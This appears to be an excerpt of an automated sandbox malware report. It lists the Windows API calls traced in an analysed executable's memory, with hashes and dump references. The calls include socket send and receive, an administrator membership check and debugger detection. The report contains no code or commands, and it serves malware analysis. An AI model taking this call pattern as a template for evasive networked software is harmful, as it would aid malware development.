                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007E05D6
                                                                              • Part of subcall function 007DF650: recv.WS2_32(00000000,?,000000FF,007E0A9A), ref: 007DF663
                                                                            • und_memcpy.LIBCMTD ref: 007E0606
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0612
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E0620
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpy
                                                                            • String ID:
                                                                            • API String ID: 3977134054-0
                                                                            • Opcode ID: 702f1e7174b68191cad86f4f631d8f38d7336e3e3d0d0c9af7528d2ecdff7e67
                                                                            • Instruction ID: 0a65a5a5bf0a1761d4f6d28722ac3782119cc293b5f5101a3acd565a66439181
                                                                            • Opcode Fuzzy Hash: 702f1e7174b68191cad86f4f631d8f38d7336e3e3d0d0c9af7528d2ecdff7e67
                                                                            • Instruction Fuzzy Hash: 674160B5E00249EFCB04DF94D881ABEB7B5BF9C300F248549F909A7342D675EA41CBA5
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D044D
                                                                            • _memset.LIBCMT ref: 007D0463
                                                                            • SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 007D04A0
                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 007D04B3
                                                                            • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 007D04C8
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 007D04DE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D04F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree_memset
                                                                            • String ID:
                                                                            • API String ID: 4046344516-0
                                                                            • Opcode ID: eea88f3deb746a4e8b534c7ad280a953551f72747d1d8700d3784e54cc651906
                                                                            • Instruction ID: 23fc9bdbb622ef8839122c3deac0e7f5b9727effe2349730e6faaa2451e101e3
                                                                            • Opcode Fuzzy Hash: eea88f3deb746a4e8b534c7ad280a953551f72747d1d8700d3784e54cc651906
                                                                            • Instruction Fuzzy Hash: 52310870E40348EFEB00DFE4E859BEEBBB4AB44704F108559F600BA2C1D7B95A44CBA1
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 007DC0AD
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 007DC0B4
                                                                            • RtlGetVersion.NTDLL(0000011C), ref: 007DC0DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcVersion
                                                                            • String ID: NTDLL$RtlGetVersion
                                                                            • API String ID: 3310240892-3678323915
                                                                            • Opcode ID: c762ec5a24f2d99fffb97ea46f8fd0cbebbb4579741f4d76785aff6add495acf
                                                                            • Instruction ID: d81ac4802bbebee3f6de48bacfc888060998bb4cdd2effd0ddaefb47d7ded018
                                                                            • Opcode Fuzzy Hash: c762ec5a24f2d99fffb97ea46f8fd0cbebbb4579741f4d76785aff6add495acf
                                                                            • Instruction Fuzzy Hash: 11F03071C4522CDBCB249F54DC09BE8BBB8BB0C315F0001D9A948A2380CB7859E4CF58
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 007EC560
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007EC575
                                                                            • UnhandledExceptionFilter.KERNEL32(007F8C78), ref: 007EC580
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 007EC59C
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 007EC5A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2579439406-0
                                                                            • Opcode ID: 71f9f16e92bd220ef561c0bd645f3464b2d21a09d4abb8d8a08ac99284f594d9
                                                                            • Instruction ID: e07c24adb881ece83ec7dad5ddff8aeb3e8452f3b8fc7ecdc048060aea19fbe3
                                                                            • Opcode Fuzzy Hash: 71f9f16e92bd220ef561c0bd645f3464b2d21a09d4abb8d8a08ac99284f594d9
                                                                            • Instruction Fuzzy Hash: C82109B8401348DFD740EF29FD896583BB4FB9C301F104859E50A8B3A1EBB85992CF05
                                                                            APIs
                                                                            • CoInitializeEx.COMBASE(00000000,00000000), ref: 007D2AE0
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007D2B06
                                                                            • CoCreateInstance.OLE32(007F7B50,00000000,00000001,007F7940,00000000), ref: 007D2B21
                                                                            • CoUninitialize.COMBASE ref: 007D2DDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$CreateInstanceSecurityUninitialize
                                                                            • String ID:
                                                                            • API String ID: 374467530-0
                                                                            • Opcode ID: f22e7216293d9c3beed00be65aad4216de7993b8407421d9fb8c3f2f122fbf8d
                                                                            • Instruction ID: 23c4061237cbdbb520f94ffb3fd81ee60ddfa9cfe1bd044d7bfa5d4c24886934
                                                                            • Opcode Fuzzy Hash: f22e7216293d9c3beed00be65aad4216de7993b8407421d9fb8c3f2f122fbf8d
                                                                            • Instruction Fuzzy Hash: E8B1C474E01219CFDB14DF58C995BADFBB1BF48310F20829AE519A7391DB346A81CF91
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                            • FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 1dfe076fa865561ff52cd5f0f0e0ad184e44d32fda71d8bd152fa59ee57c82c1
                                                                            • Instruction ID: 2eac3d579a5f612d51017f41547bc7b119600dab9e3cfa7f48fdf776cce36205
                                                                            • Opcode Fuzzy Hash: 1dfe076fa865561ff52cd5f0f0e0ad184e44d32fda71d8bd152fa59ee57c82c1
                                                                            • Instruction Fuzzy Hash: 2201FB34D44388FAEB15DBE8D859BAEBFB8AB18704F0444C8E544AA2C1D7B95644CB91
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1028938620-0
                                                                            • Opcode ID: 3338ac1d707adee57eeaf954d44fe57c1c5e4da5764b55948ec1d9da6c973546
                                                                            • Instruction ID: d2f84b06e7871f9cf9b9bcfea2fd88df6842a881ff06ed566c806df71e7ab448
                                                                            • Opcode Fuzzy Hash: 3338ac1d707adee57eeaf954d44fe57c1c5e4da5764b55948ec1d9da6c973546
                                                                            • Instruction Fuzzy Hash: 780186B5A04208FBEB04DF90EC89BED7774EF88700F108519F605AB280F7799944C754
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                              • Part of subcall function 007DF670: send.WS2_32(00000000,?,000000FF,007E0E0C), ref: 007DF683
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale___crtclosesocketsendsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1028938620-0
                                                                            • Opcode ID: 81040521ad41993b8c03e0ced297aa46e96b58a65889e78eecfbead36f710734
                                                                            • Instruction ID: d2f84b06e7871f9cf9b9bcfea2fd88df6842a881ff06ed566c806df71e7ab448
                                                                            • Opcode Fuzzy Hash: 81040521ad41993b8c03e0ced297aa46e96b58a65889e78eecfbead36f710734
                                                                            • Instruction Fuzzy Hash: 780186B5A04208FBEB04DF90EC89BED7774EF88700F108519F605AB280F7799944C754
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0083CB2C,?,007D3EE3), ref: 007C5728
                                                                            • IsWow64Process.KERNEL32(00000000,?,007D3EE3), ref: 007C572F
                                                                            • GetProcessHeap.KERNEL32(?,007D3EE3), ref: 007C5735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentHeapWow64
                                                                            • String ID:
                                                                            • API String ID: 1399170734-0
                                                                            • Opcode ID: 6a91e827e887e2adb63dba58c59af332e0e88aeb56f57c87fbd7578df20e333a
                                                                            • Instruction ID: 2887ff6c1fa7e1a35c372195cd0bc36163e38e5c7a8d0aac5a3c504d76b7a789
                                                                            • Opcode Fuzzy Hash: 6a91e827e887e2adb63dba58c59af332e0e88aeb56f57c87fbd7578df20e333a
                                                                            • Instruction Fuzzy Hash: 5FC01233815204ABC2002BB4ED0E624BBA8FB487A1B408022F509C2262CE7A5842CB68
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: 1f997026327d8feff8b771a661ac89db1acfaac562194332fbfbff765ab7d02e
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: 1f997026327d8feff8b771a661ac89db1acfaac562194332fbfbff765ab7d02e
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: 91fe7db979a346df88a25c2fa2e30176ffa8a706de19925e4ce90bb2e2d8bc46
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: 91fe7db979a346df88a25c2fa2e30176ffa8a706de19925e4ce90bb2e2d8bc46
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: ad2efd105bb5aece2daa65fcdb4587d38bb67473474f45fdc6993ca845b02a54
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: ad2efd105bb5aece2daa65fcdb4587d38bb67473474f45fdc6993ca845b02a54
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            APIs
                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,007C9E2A,00000000), ref: 007DC06A
                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,007C9E2A,00000000), ref: 007DC07A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                            • String ID:
                                                                            • API String ID: 3989222877-0
                                                                            • Opcode ID: b6fe038029a45d9d148558717c8be783f5c46edc437d7c4686ef2b705301c0d3
                                                                            • Instruction ID: 0b944b1017d314c7e420e7d4d41c9d658aabc82fc74fcd7ff3969d8eadf9c150
                                                                            • Opcode Fuzzy Hash: b6fe038029a45d9d148558717c8be783f5c46edc437d7c4686ef2b705301c0d3
                                                                            • Instruction Fuzzy Hash: 6AE01735901208EBCB15DBA4E998BADB774FB44709F108586E904A22A0C3795A84DB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @
                                                                            • API String ID: 0-2766056989
                                                                            • Opcode ID: da476ffe59913d7d5caf7e5f659aba0fb4c2d5a17d422f329ab8587546812b84
                                                                            • Instruction ID: 735bae394d01ebe08ae08e416c6ecb6eebf3b270a0444913ea9b1944a94019f1
                                                                            • Opcode Fuzzy Hash: da476ffe59913d7d5caf7e5f659aba0fb4c2d5a17d422f329ab8587546812b84
                                                                            • Instruction Fuzzy Hash: 6372AFB4A052299BDB65CF58CC98BE9B7B2BF98304F1481DAD409AB345D735AE81CF40
                                                                            APIs
                                                                              • Part of subcall function 007E0790: WSACreateEvent.WS2_32 ref: 007E0796
                                                                              • Part of subcall function 007E0790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 007E07B3
                                                                              • Part of subcall function 007E0790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 007E07F3
                                                                              • Part of subcall function 007E0790: WSACloseEvent.WS2_32(00000000), ref: 007E0800
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007DF6EA
                                                                            Memory Dump Source
